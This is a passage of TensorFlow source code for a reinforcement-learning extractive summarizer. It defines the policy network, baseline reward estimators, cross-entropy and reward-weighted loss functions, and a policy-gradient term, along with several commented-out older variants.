        FLAGS.target_label_size]; only used during cross-entropy training of
        JP's model (attend_encoder variant).

    Returns:
      Tuple of (sentence extractor output, logits without softmax).
    """
    with tf.variable_scope('PolicyNetwork') as scope:
        ### Full word-embedding lookup variable.
        # PAD embedding is fixed at zero (non-trainable); UNK is trainable.
        pad_embed_variable = variable_on_cpu("pad_embed", [1, FLAGS.wordembed_size], tf.constant_initializer(0), trainable=False)
        unk_embed_variable = variable_on_cpu("unk_embed", [1, FLAGS.wordembed_size], tf.constant_initializer(0), trainable=True)
        # Rows: [PAD, UNK, vocab...] — must match the id scheme of the input.
        fullvocab_embed_variable = tf.concat(axis=0, values=[pad_embed_variable, unk_embed_variable, vocab_embed_variable])

        ### Lookup layer: ids -> word embeddings.
        with tf.variable_scope('Lookup') as scope:
            document_placeholder_flat = tf.reshape(document_placeholder, [-1])
            document_word_embedding = tf.nn.embedding_lookup(fullvocab_embed_variable, document_placeholder_flat, name="Lookup")
            document_word_embedding = tf.reshape(document_word_embedding, [-1, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length),
                                                                           FLAGS.max_sent_length, FLAGS.wordembed_size])

        ### Convolution layer: word embeddings -> one embedding per sentence.
        with tf.variable_scope('ConvLayer') as scope:
            document_word_embedding = tf.reshape(document_word_embedding, [-1, FLAGS.max_sent_length, FLAGS.wordembed_size])
            document_sent_embedding = conv1d_layer_sentence_representation(document_word_embedding)  # [None, sentembed_size]
            document_sent_embedding = tf.reshape(document_sent_embedding, [-1, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length),
                                                                           FLAGS.sentembed_size])

        ### Reshape tensor to list: [-1, total_length, sentembed_size] -> list of [-1, sentembed_size].
        with variable_scope.variable_scope("ReshapeDoc_TensorToList"):
            document_sent_embedding = reshape_tensor2list(document_sent_embedding, (FLAGS.max_doc_length + FLAGS.max_title_length + FLAGS.max_image_length), FLAGS.sentembed_size)

        # Split the sentence list into encoder input, extractor input, and
        # title/image sentences (everything past max_doc_length).
        document_sents_enc = document_sent_embedding[:FLAGS.max_doc_length]
        if FLAGS.doc_encoder_reverse:
            document_sents_enc = document_sents_enc[::-1]
        document_sents_ext = document_sent_embedding[:FLAGS.max_doc_length]
        document_sents_titimg = document_sent_embedding[FLAGS.max_doc_length:]

        ### Document encoder.
        with tf.variable_scope('DocEnc') as scope:
            encoder_outputs, encoder_state = simple_rnn(document_sents_enc)

        ### Sentence label extractor — variant selected by flags.
        with tf.variable_scope('SentExt') as scope:
            if (FLAGS.attend_encoder) and (len(document_sents_titimg) != 0):
                # Multiple decoder
                print("Multiple decoder is not implement yet.")
                exit(0)
                # # Decoder to attend captions
                # attendtitimg_extractor_output, _ = simple_attentional_rnn(document_sents_ext, document_sents_titimg, initial_state=encoder_state)
                # # Attend previous decoder
                # logits = sentence_extractor_seqrnn_docatt(document_sents_ext, attendtitimg_extractor_output, encoder_state, label_placeholder)
            elif (not FLAGS.attend_encoder) and (len(document_sents_titimg) != 0):
                # Attend only title/images during decoding.
                extractor_output, logits = sentence_extractor_nonseqrnn_titimgatt(document_sents_ext, encoder_state, document_sents_titimg)
            elif (FLAGS.attend_encoder) and (len(document_sents_titimg) == 0):
                # JP model: attend encoder.
                # Fix: bind 'extractor_output' (singular) — the original bound
                # 'extractor_outputs' here, causing a NameError at the return
                # below whenever this branch was taken.
                extractor_output, logits = sentence_extractor_seqrnn_docatt(document_sents_ext, encoder_outputs, encoder_state, label_placeholder)
            else:
                # Attend nothing.
                extractor_output, logits = sentence_extractor_nonseqrnn_noatt(document_sents_ext, encoder_state)

        return extractor_output, logits
def baseline_future_reward_estimator(extractor_output):
    """Linear-regression baseline estimating a future reward per sentence.

    Args:
      extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length,
        FLAGS.size or 2*FLAGS.size]

    Returns:
      future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
    """
    with tf.variable_scope('FutureRewardEstimator') as scope:
        feat_size = extractor_output.get_shape()[2].value

        # Single linear unit: one scalar reward per sentence position.
        w = variable_on_cpu('weight', [feat_size, 1], tf.random_normal_initializer())
        b = variable_on_cpu('bias', [1], tf.random_normal_initializer())

        flat_features = tf.reshape(extractor_output, [-1, feat_size])
        rewards = tf.matmul(flat_features, w) + b  # [batch*doc_len, 1]
        rewards = tf.reshape(rewards, [-1, FLAGS.max_doc_length, 1])
        # Drop the trailing singleton dim -> [batch, doc_len].
        return tf.squeeze(rewards)
def baseline_single_future_reward_estimator(extractor_output):
    """Linear-regression baseline estimating one future reward per document.

    Args:
      extractor_output: [FLAGS.batch_size, FLAGS.max_doc_length,
        FLAGS.size or 2*FLAGS.size]

    Returns:
      future_rewards: [FLAGS.batch_size]
    """
    with tf.variable_scope('FutureRewardEstimator') as scope:
        feat_size = extractor_output.get_shape()[2].value

        # Regress over the whole flattened document representation.
        w = variable_on_cpu('weight', [FLAGS.max_doc_length*feat_size, 1], tf.random_normal_initializer())
        b = variable_on_cpu('bias', [1], tf.random_normal_initializer())

        doc_features = tf.reshape(extractor_output, [-1, FLAGS.max_doc_length*feat_size])  # [batch, doc_len*feat]
        rewards = tf.matmul(doc_features, w) + b  # [batch, 1]
        # Drop the trailing singleton dim -> [batch].
        return tf.squeeze(rewards)
### Loss Functions
def mean_square_loss_doclevel(future_rewards, actual_reward):
    """Mean squared error between predicted and actual document-level rewards.

    Args:
      future_rewards: [FLAGS.batch_size]
      actual_reward: [FLAGS.batch_size]

    Returns:
      Scalar mean squared loss.
    """
    with tf.variable_scope('MeanSquareLoss') as scope:
        per_doc_loss = tf.square(future_rewards - actual_reward)  # [batch]
        loss = tf.reduce_mean(per_doc_loss)
        tf.add_to_collection('mean_square_loss', loss)
        return loss
def mean_square_loss(future_rewards, actual_reward, weights):
    """Mean squared error between per-sentence predicted and actual rewards.

    Args:
      future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
      actual_reward: [FLAGS.batch_size]
      weights: Mask to ignore the padded part
        [FLAGS.batch_size, FLAGS.max_doc_length]

    Returns:
      Scalar mean squared loss.
    """
    with tf.variable_scope('MeanSquareLoss') as scope:
        # Broadcast the single document reward over all sentence positions.
        actual_reward = tf.expand_dims(actual_reward, 1)  # [batch, 1]
        sq_loss = tf.square(future_rewards - actual_reward)  # [batch, doc_len]
        if FLAGS.weighted_loss:
            # Mask padded sentences and average over valid sentences only.
            # Fix: tf.mul was removed in TF 1.0; use tf.multiply as the rest
            # of this file does.
            sq_loss = tf.multiply(sq_loss, weights)
            valid_sentences = tf.reduce_sum(weights)
            mean_sq_loss = tf.reduce_sum(sq_loss) / valid_sentences
        else:
            mean_sq_loss = tf.reduce_mean(sq_loss)
        tf.add_to_collection('mean_square_loss', mean_sq_loss)
        return mean_sq_loss
def cross_entropy_loss(logits, labels, weights):
    """Cross-entropy cost of the sentence-label predictions.

    Args:
      logits: Logits from inference()
        [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      labels: Gold sentence-extraction labels
        [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      weights: Mask to ignore the padded part
        [FLAGS.batch_size, FLAGS.max_doc_length]

    Returns:
      Scalar cross-entropy cost (summed per document, averaged over the batch).
    """
    with tf.variable_scope('CrossEntropyLoss') as scope:
        # Flatten to match softmax_cross_entropy_with_logits' expectations.
        logits = tf.reshape(logits, [-1, FLAGS.target_label_size])  # [batch*doc_len, labels]
        labels = tf.reshape(labels, [-1, FLAGS.target_label_size])  # [batch*doc_len, labels]
        # Fix: TF 1.x requires keyword arguments here (the positional form was
        # pre-1.0 and is inconsistent with the call at
        # reward_weighted_cross_entropy_loss_multisample).
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels)  # [batch*doc_len]
        cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length])  # [batch, doc_len]
        if FLAGS.weighted_loss:
            # Fix: tf.mul was removed in TF 1.0; use tf.multiply.
            cross_entropy = tf.multiply(cross_entropy, weights)
        # Cross entropy per document, then mean over the batch.
        cross_entropy = tf.reduce_sum(cross_entropy, reduction_indices=1)  # [batch]
        cross_entropy_mean = tf.reduce_mean(cross_entropy, name='crossentropy')
        tf.add_to_collection('cross_entropy_loss', cross_entropy_mean)
        return cross_entropy_mean
def predict_labels(logits):
    """Predict one-hot labels from logits.

    Works only when FLAGS.target_label_size == 2: the argmin/argmax columns
    together form a valid one-hot encoding.

    Args:
      logits: Logits from inference()
        [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]

    Returns:
      One-hot labels
      [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    """
    with tf.variable_scope('PredictLabels') as scope:
        # Flatten for argmax/argmin over the label dimension.
        logits = tf.reshape(logits, [-1, FLAGS.target_label_size])  # [batch*doc_len, labels]
        # Predicted class index per sentence.
        logits_argmax = tf.argmax(logits, 1)  # [batch*doc_len]
        logits_argmax = tf.reshape(logits_argmax, [-1, FLAGS.max_doc_length])  # [batch, doc_len]
        logits_argmax = tf.expand_dims(logits_argmax, 2)  # [batch, doc_len, 1]
        logits_argmin = tf.argmin(logits, 1)  # [batch*doc_len]
        logits_argmin = tf.reshape(logits_argmin, [-1, FLAGS.max_doc_length])  # [batch, doc_len]
        logits_argmin = tf.expand_dims(logits_argmin, 2)  # [batch, doc_len, 1]
        # Fix: TF 1.0 changed tf.concat's argument order; use keyword args as
        # done elsewhere in this file.
        labels = tf.concat(axis=2, values=[logits_argmin, logits_argmax])  # [batch, doc_len, labels]
        dtype = tf.float16 if FLAGS.use_fp16 else tf.float32
        labels = tf.cast(labels, dtype)
        return labels
def estimate_ltheta_ot(logits, labels, future_rewards, actual_rewards, weights):
    """Estimate d(L_theta)/d(o_t): policy-gradient term weighted by the
    advantage (actual reward minus the predicted baseline reward).

    Args:
      logits: Logits from inference()
        [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      labels: Label placeholder for self prediction
        [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
      actual_rewards: [FLAGS.batch_size]
      weights: Mask to ignore the padded part
        [FLAGS.batch_size, FLAGS.max_doc_length]

    Returns:
      [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
    """
    with tf.variable_scope('LTheta_Ot') as scope:
        # Broadcast the document reward over sentence positions via
        # tile -> reshape -> transpose: [a,b] -> [[a,a,a],[b,b,b]].
        actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length])  # [batch*doc_len]
        actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1])  # [doc_len, batch]
        actual_rewards = tf.transpose(actual_rewards)  # [batch, doc_len]
        # Advantage: external reward minus predicted baseline reward.
        diff_act_pred = actual_rewards - future_rewards  # [batch, doc_len]
        diff_act_pred = tf.expand_dims(diff_act_pred, 2)  # [batch, doc_len, 1]
        # Duplicate over the label dimension (FLAGS.target_label_size == 2).
        # Fix: TF 1.0 changed tf.concat's argument order; use keyword args.
        diff_act_pred = tf.concat(axis=2, values=[diff_act_pred, diff_act_pred])  # [batch, doc_len, labels]
        # Softmax the logits (flatten, softmax, restore shape).
        logits = tf.reshape(logits, [-1, FLAGS.target_label_size])  # [batch*doc_len, labels]
        logits = tf.nn.softmax(logits)
        logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size])  # [batch, doc_len, labels]
        # Gradient of softmax-CE w.r.t. logits: probabilities minus indicator.
        diff_logits_indicator = logits - labels  # [batch, doc_len, labels]
        # Weight by the advantage.
        # Fix: tf.mul was removed in TF 1.0; use tf.multiply.
        d_ltheta_ot = tf.multiply(diff_act_pred, diff_logits_indicator)  # [batch, doc_len, labels]
        # Zero out padded sentences.
        weights = tf.expand_dims(weights, 2)  # [batch, doc_len, 1]
        weights = tf.concat(axis=2, values=[weights, weights])  # [batch, doc_len, labels]
        d_ltheta_ot = tf.multiply(d_ltheta_ot, weights)  # [batch, doc_len, labels]
        return d_ltheta_ot
# def estimate_ltheta_ot_mixer(logits, labels_gold, labels_pred, future_rewards, actual_rewards, weights, annealing_step):
# """
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels_gold: Label placeholdr for gold labels [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels_pred: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# annealing_step: [1], single value but in tensor form
# Returns:
# [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# """
# with tf.variable_scope('LTheta_Ot_Mixer') as scope:
# print(annealing_step)
# policygradloss_length = tf.reduce_sum(annealing_step) * FLAGS.annealing_step_delta
# crossentryloss_length = FLAGS.max_doc_length - policygradloss_length
# # Reshape logits and partition
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# logits = tf.nn.softmax(logits)
# logits = tf.reshape(logits, [-1, FLAGS.max_doc_length, FLAGS.target_label_size]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# logits_list = reshape_tensor2list(logits, FLAGS.max_doc_length, FLAGS.target_label_size)
# logits_ce_gold_list = logits_list[0:crossentryloss_length]
# logits_ce_gold = reshape_list2tensor(logits_ce_gold_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# logits_reward_list = logits_list[crossentryloss_length:]
# logits_reward = reshape_list2tensor(logits_reward_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Crossentropy loss with gold labels: partition gold_labels
# labels_gold_list = reshape_tensor2list(labels_gold, FLAGS.max_doc_length, FLAGS.target_label_size)
# labels_gold_used_list = labels_gold_list[0:crossentryloss_length]
# labels_gold_used = reshape_list2tensor(labels_gold_used_list, crossentryloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# # d_ltheta_ot : cross entropy
# diff_logits_goldlabels = logits_ce_gold - labels_gold_used # [FLAGS.batch_size, crossentryloss_length, FLAGS.target_label_size]
# # Policy gradient for rest
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# diff_act_pred = actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = tf.expand_dims(diff_act_pred, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# # Convert (FLAGS.target_label_size = 2)
# diff_act_pred = tf.concat(2, [diff_act_pred, diff_act_pred]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get used reward diff
# diff_act_pred_list = reshape_tensor2list(diff_act_pred, FLAGS.max_doc_length, FLAGS.target_label_size)
# diff_reward_act_pred_used_list = diff_act_pred_list[crossentryloss_length:]
# diff_reward_act_pred_used = reshape_list2tensor(diff_reward_act_pred_used_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Partition predicted labels
# labels_pred_list = reshape_tensor2list(labels_pred, FLAGS.max_doc_length, FLAGS.target_label_size)
# labels_pred_used_list = labels_pred_list[crossentryloss_length:]
# labels_pred_used = reshape_list2tensor(labels_pred_used_list, policygradloss_length, FLAGS.target_label_size) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # d_ltheta_ot : reward weighted
# diff_logits_predlabels = logits_reward - labels_pred_used # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Multiply with reward
# reward_weighted_diff_logits_predlabels = tf.mul(diff_reward_act_pred_used, diff_logits_predlabels) # [FLAGS.batch_size, policygradloss_length, FLAGS.target_label_size]
# # Concat both part
# d_ltheta_ot_mixer = tf.concat(1, [diff_logits_goldlabels, reward_weighted_diff_logits_predlabels]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# # Multiply with weight
# weights = tf.expand_dims(weights, 2) # [FLAGS.batch_size, FLAGS.max_doc_length, 1]
# weights = tf.concat(2, [weights, weights]) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# d_ltheta_ot_mixer = tf.mul(d_ltheta_ot_mixer, weights) # [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# return d_ltheta_ot_mixer
def reward_weighted_cross_entropy_loss_multisample(logits, labels, actual_rewards, weights):
    """Reward-weighted cross-entropy over (multi-)sampled label rollouts.

    Despite the name, the current code handles a single rollout per document
    (the expansion loop over FLAGS.num_sample_rollout is commented out), so
    the rollout dimension below is fixed at 1.

    Args:
      logits: Logits from inference()
        [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      labels: Sampled label placeholder
        [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size]
      actual_rewards: [FLAGS.batch_size, 1]
      weights: Mask to ignore the padded part
        [FLAGS.batch_size, FLAGS.max_doc_length]

    Returns:
      Scalar reward-weighted cross-entropy cost.
    """
    with tf.variable_scope('RWCELossMultiSample') as scope:
        # Insert a rollout dimension of size 1 into logits and weights.
        logits_temp = tf.expand_dims(logits, 1)  # [FLAGS.batch_size, 1, FLAGS.max_doc_length, FLAGS.target_label_size]
        weights_temp = tf.expand_dims(weights, 1)  # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
        logits_expanded = logits_temp
        weights_expanded = weights_temp
        # Expansion to num_sample_rollout copies is disabled:
        # for ridx in range(1,FLAGS.num_sample_rollout):
        #     logits_expanded = tf.concat(1, [logits_expanded, logits_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length, FLAGS.target_label_size]
        #     weights_expanded = tf.concat(1, [weights_expanded, weights_temp]) # [FLAGS.batch_size, n++, FLAGS.max_doc_length]
        # Flatten to match softmax_cross_entropy_with_logits' expectations.
        logits_expanded = tf.reshape(logits_expanded, [-1, FLAGS.target_label_size])  # [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size]
        labels = tf.reshape(labels, [-1, FLAGS.target_label_size])  # [FLAGS.batch_size*1*FLAGS.max_doc_length, FLAGS.target_label_size]
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits = logits_expanded, labels = labels)  # [FLAGS.batch_size*1*FLAGS.max_doc_length]
        cross_entropy = tf.reshape(cross_entropy, [-1, 1, FLAGS.max_doc_length])  # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
        if FLAGS.weighted_loss:
            # Zero out padded sentences.
            cross_entropy = tf.multiply(cross_entropy, weights_expanded)  # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
        # Broadcast each document's reward over all its sentence positions via
        # flatten -> tile -> reshape -> transpose (worked examples inline).
        actual_rewards = tf.reshape(actual_rewards, [-1])  # [FLAGS.batch_size*1]
        # [[a, b], [c, d], [e, f]] 3x2 => [a, b, c, d, e, f] [6]
        actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length])  # [FLAGS.batch_size * 1 * FLAGS.max_doc_length]
        # [a, b, c, d, e, f] * 2 = [a, b, c, d, e, f, a, b, c, d, e, f] [12]
        actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1])  # [FLAGS.max_doc_length, FLAGS.batch_size*1]
        # [[a, b, c, d, e, f], [a, b, c, d, e, f]] [2, 6]
        actual_rewards = tf.transpose(actual_rewards)  # [FLAGS.batch_size*1, FLAGS.max_doc_length]
        # [[a,a], [b,b], [c,c], [d,d], [e,e], [f,f]] [6 x 2]
        actual_rewards = tf.reshape(actual_rewards, [-1, 1, FLAGS.max_doc_length])  # [FLAGS.batch_size, 1, FLAGS.max_doc_length],
        # [[[a,a], [b,b]], [[c,c], [d,d]], [[e,e], [f,f]]] [3 x 2 x 2]
        # Weight each sentence's cross entropy by its document's reward.
        reward_weighted_cross_entropy = tf.multiply(cross_entropy, actual_rewards)  # [FLAGS.batch_size, 1, FLAGS.max_doc_length]
        # Sum per sample/document, then average over the batch.
        reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=2)  # [FLAGS.batch_size, 1]
        reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcemultisample')
        tf.add_to_collection('reward_cross_entropy_loss_multisample', reward_weighted_cross_entropy_mean)
        return reward_weighted_cross_entropy_mean
def reward_weighted_cross_entropy_loss(logits, labels, actual_rewards, weights):
    """Reward-weighted cross-entropy cost of self-predicted labels.

    Args:
      logits: Logits from inference()
        [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      labels: Label placeholder for self prediction
        [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
      actual_rewards: [FLAGS.batch_size]
      weights: Mask to ignore the padded part
        [FLAGS.batch_size, FLAGS.max_doc_length]

    Returns:
      Scalar reward-weighted cross-entropy cost.
    """
    with tf.variable_scope('RewardWeightedCrossEntropyLoss') as scope:
        # Flatten to match softmax_cross_entropy_with_logits' expectations.
        logits = tf.reshape(logits, [-1, FLAGS.target_label_size])  # [batch*doc_len, labels]
        labels = tf.reshape(labels, [-1, FLAGS.target_label_size])  # [batch*doc_len, labels]
        # Fix: TF 1.x requires keyword arguments here, consistent with
        # reward_weighted_cross_entropy_loss_multisample.
        cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels)  # [batch*doc_len]
        cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length])  # [batch, doc_len]
        if FLAGS.weighted_loss:
            # Fix: tf.mul was removed in TF 1.0; use tf.multiply.
            cross_entropy = tf.multiply(cross_entropy, weights)  # [batch, doc_len]
        # Broadcast the document reward over sentence positions via
        # tile -> reshape -> transpose: [a,b] -> [[a,a,a],[b,b,b]].
        actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length])  # [batch*doc_len]
        actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1])  # [doc_len, batch]
        actual_rewards = tf.transpose(actual_rewards)  # [batch, doc_len]
        # Weight each sentence's cross entropy by its document's reward.
        reward_weighted_cross_entropy = tf.multiply(cross_entropy, actual_rewards)  # [batch, doc_len]
        # Sum per document, then average over the batch.
        reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1)  # [batch]
        reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
        tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean)
        return reward_weighted_cross_entropy_mean
# def reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights):
# """Estimate cost of predictions
# Add summary for "cost" and "cost/avg".
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# Returns:
# Cross-entropy Cost
# """
# with tf.variable_scope('RewardWeightedCrossEntropyLoss') as scope:
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# # Error: actual_rewards = tf.reshape(tf.tile(actual_rewards, [FLAGS.max_doc_length]),[-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Multiply with reward
# reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Cross entroy / document
# reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
# tf.add_to_collection('reward_cross_entropy_loss', reward_weighted_cross_entropy_mean)
# return reward_weighted_cross_entropy_mean
# def temp_reward_weighted_cross_entropy_loss(logits, labels, future_rewards, actual_rewards, weights):
# """Estimate cost of predictions
# Add summary for "cost" and "cost/avg".
# Args:
# logits: Logits from inference(). [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# labels: Label placeholdr for self prediction [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# future_rewards: [FLAGS.batch_size, FLAGS.max_doc_length]
# actual_reward: [FLAGS.batch_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# Returns:
# Cross-entropy Cost
# """
# with tf.variable_scope('TempRewardWeightedCrossEntropyLoss') as scope:
# # Get Reward Weights: External reward - Predicted reward
# actual_rewards = tf.tile(actual_rewards, [FLAGS.max_doc_length]) # [FLAGS.batch_size * FLAGS.max_doc_length] , [a,b] * 3 = [a, b, a, b, a, b]
# actual_rewards = tf.reshape(actual_rewards, [FLAGS.max_doc_length, -1]) # [FLAGS.max_doc_length, FLAGS.batch_size], # [[a,b], [a,b], [a,b]]
# actual_rewards = tf.transpose(actual_rewards) # [FLAGS.batch_size, FLAGS.max_doc_length] # [[a,a,a], [b,b,b]]
# diff_act_pred = future_rewards - actual_rewards # actual_rewards - future_rewards # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Reshape logits and labels to match the requirement of softmax_cross_entropy_with_logits
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# labels = tf.reshape(labels, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits, labels) # [FLAGS.batch_size*FLAGS.max_doc_length]
# cross_entropy = tf.reshape(cross_entropy, [-1, FLAGS.max_doc_length]) # [FLAGS.batch_size, FLAGS.max_doc_length]
# if FLAGS.weighted_loss:
# cross_entropy = tf.mul(cross_entropy, weights) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Multiply with reward
# reward_weighted_cross_entropy = tf.mul(cross_entropy, diff_act_pred) # [FLAGS.batch_size, FLAGS.max_doc_length]
# # Cross entroy / document
# reward_weighted_cross_entropy = tf.reduce_sum(reward_weighted_cross_entropy, reduction_indices=1) # [FLAGS.batch_size]
# reward_weighted_cross_entropy_mean = tf.reduce_mean(reward_weighted_cross_entropy, name='rewardweightedcrossentropy')
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate, name='adam')
# # Compute gradients of policy network
# policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="PolicyNetwork")
# # print(policy_network_variables)
# # Compute gradients of policy network
# grads_and_vars = optimizer.compute_gradients(reward_weighted_cross_entropy_mean, var_list=policy_network_variables)
# # print(grads_and_vars)
# return actual_rewards, cross_entropy, diff_act_pred, reward_weighted_cross_entropy, reward_weighted_cross_entropy_mean, grads_and_vars
# def cross_entropy_loss_selfprediction(logits, weights):
# """Optimizing expected reward: Weighted cross entropy
# args:
# logits: Logits without softmax. [FLAGS.batch_size, FLAGS.max_doc_length, FLAGS.target_label_size]
# weights: Weights to avoid padded part [FLAGS.batch_size, FLAGS.max_doc_length]
# return:
# [FLAGS.batch_size, FLAGS.max_doc_length]
# """
# with tf.variable_scope('SelfPredCrossEntropyLoss') as scope:
# # Reshape logits for argmax and argmin
# logits = tf.reshape(logits, [-1, FLAGS.target_label_size]) # [FLAGS.batch_size*FLAGS.max_doc_length, FLAGS.target_label_size]
# # Get labels if predicted using these logits
